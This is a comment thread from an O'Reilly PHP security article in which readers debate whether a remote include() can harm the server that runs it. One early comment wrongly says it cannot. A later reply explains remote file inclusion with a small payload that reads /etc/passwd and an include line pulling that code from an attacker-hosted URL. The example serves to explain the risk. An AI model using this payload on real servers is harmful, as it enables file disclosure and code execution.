Article:  |
Ten Security Checks for PHP, Part 1 | |
| Subject: | Not the kind of article i would expect from o'reilly! | |
| Date: | 2003-03-28 09:48:45 | |
| From: | anonymous2 | |
|
First, include("http://www.some-BAD-site.com/whatever.php") can't really do any harm, since it is executed on the some-bad-site.com, and not on the targeted machine.
|
||
Showing messages 1 through 4 of 4.
-
Not the kind of article i would expect from o'reilly!
2005-02-06 03:49:12 bbbbbbbbbbbbbb [View]
-
Not the kind of article i would expect from o'reilly!
2005-02-06 13:52:17 Clancy Malcolm |
[View]
"Obviously, you assume that www.some-BAD-site.com is running php."
No, in fact it is assumed that www.some-BAD-site.com is NOT running PHP and it provides raw PHP code to the server that runs the include statement. This is the essence of this security risk - the PHP engine will execute PHP code loaded from a different web site.
-
Not the kind of article i would expect from o'reilly!
2003-03-29 05:08:06 anonymous2 [View]
Include *can* harm o your server, read the comments in the PHP documentation before you spread misinformation:
http://www.php.net/manual/en/function.include.php -
Not the kind of article i would expect from o'reilly!
2003-05-23 00:10:42 clancymalcolm [View]
To further clarify how include(...) can harm your own server...
I can upload a file to my webserver called crack.txt that contains the following:
<?php
readfile("/etc/passwd");
?>
Notice that this is a .txt file - my web server won't execute the PHP code contained in the file.
Now if I can make YOUR web server run the code
include("http://www.mywebserver.com/crack.txt");
Then YOUR web server will show me it's /etc/passwd file. Of course I could have done almost anything else in my source code - delete files, run other programs, etc - almost anything that the web server's user account has permissions to do.
Clancy.
Obviously, you assume that www.some-BAD-site.com is running php.
Then, what if it doesn't,eh? ;)